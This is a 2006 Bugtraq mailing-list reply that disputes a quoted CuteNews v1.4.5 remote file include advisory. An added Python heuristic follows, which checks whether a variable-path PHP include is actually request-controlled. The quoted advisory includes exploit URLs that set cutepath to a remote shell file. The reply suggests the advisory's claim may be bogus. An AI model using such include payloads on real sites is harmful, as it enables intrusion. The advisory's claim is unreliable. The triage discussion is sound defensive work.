Message-ID: <456C1666.3060300@libero.it>
Date: Tue, 28 Nov 2006 11:58:46 +0100
From: raven <locrideweb@...ero.it>
To: philip anselmo <spoonman500@...mail.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability

The question is:
Why don't those who "find" a vuln check that it is really a vuln?
Sending fake vuln advisories is stupid and useless... for me... Bugtraq is a
security mailing list, and those who post there need to guarantee that it is a
real mistake. I can't believe that every time anyone sends something,
another person writes: "It's bogus", "It's not a real vulnerability" or
something like this...
Posters, check what you find before sending it here.
Regards,
Francesco Vollero


philip anselmo wrote:
> Title : CuteNews v1.4.5 (search.php) Remote file include
> ########################################################################
> #######
>
> Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
>
> ------------------------------------------------------------------------
> Source Code:
> **********
> http://cutephp.com/
>
> Affected software description :
> ******************************
> vendor site: http://cutephp.com/
> Application : CuteNews v1.4.5
> Category: Remote File Include
> ------------------------------------------------------------------------
> Vulnerable Code:
> ***************
> require_once("$cutepath/inc/functions.inc.php");
> require_once("$cutepath/data/config.php");
>
> affected file: search.php & show_news.php & show_archives.php
> ----------------------------------------------------------------------
> Exploit:
> *******
> http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt?
> http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
> http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?
>
> ------------------------------------------------------------------------
> ----
>
> greetz: 
> Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all 
> my friends
>
> Special Greeting:AsbMay's Group & TrYaG TeaM
>
> channel:www.asb-may.net & www.tryag.com
>
> contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@...mail.com
>
>
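
The check the reply asks reporters to make, sketched as an added example (not code from this thread or from CuteNews): before calling a variable-path `require_once` a remote file include, see whether the variable is assigned earlier in the same file. The PHP snippets are constructed samples and `triage_includes` is a hypothetical helper; the heuristic reads line by line and ignores control flow, functions and other included files.

```python
import re

# An include/require statement whose path expression uses a PHP variable.
INCLUDE = re.compile(r'\b(?:require|include)(?:_once)?\b[^;]*?\$(\w+)', re.I)
# A plain top-of-line assignment: $name = <rhs>
ASSIGN = re.compile(r'^\s*\$(\w+)\s*=(?!=)\s*(.*)')
# Request data reaching the script directly.
REQUEST = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b|\$HTTP_(?:GET|POST|COOKIE)_VARS\b')
RANK = {"initialized": 0, "uninitialized": 1, "request-controlled": 2}

def _rhs_state(rhs, state):
    """Worst-case state of the values an assignment's right-hand side reads."""
    if REQUEST.search(rhs):
        return "request-controlled"
    worst = "initialized"
    for var in re.findall(r'\$(\w+)', rhs):
        seen = state.get(var, "uninitialized")
        if RANK[seen] > RANK[worst]:
            worst = seen
    return worst

def triage_includes(php_source):
    """Return (line, variable, verdict) for every variable-path include.

    "initialized": assigned from non-request data before the include, so a
        request parameter of the same name is overwritten.
    "uninitialized": never assigned in this file; settable from the request
        only where register_globals is on (the option was removed in PHP 5.4).
    "request-controlled": assigned from $_GET/$_POST/$_REQUEST/$_COOKIE.
    """
    state, findings = {}, []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines
        m = ASSIGN.match(line)
        if m:
            state[m.group(1)] = _rhs_state(m.group(2), state)
            continue
        m = INCLUDE.search(line)
        if m:
            findings.append((lineno, m.group(1), state.get(m.group(1), "uninitialized")))
    return findings

# Constructed samples (not CuteNews source): same include, three contexts.
GUARDED = '<?php\n$cutepath = dirname(__FILE__);\nrequire_once("$cutepath/inc/functions.inc.php");\n'
UNSET = '<?php\nrequire_once("$cutepath/inc/functions.inc.php");\nrequire_once("$cutepath/data/config.php");\n'
FROM_REQUEST = '<?php\n$cutepath = $_GET["cutepath"];\nrequire_once("$cutepath/data/config.php");\n'

if __name__ == "__main__":
    for name, src in (("guarded", GUARDED), ("unset", UNSET), ("request", FROM_REQUEST)):
        print(name, triage_includes(src))
```

Only the "request-controlled" verdict stands on the quoted lines alone; "uninitialized" still needs the server configuration and every file that includes the script to be checked before it is reported.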
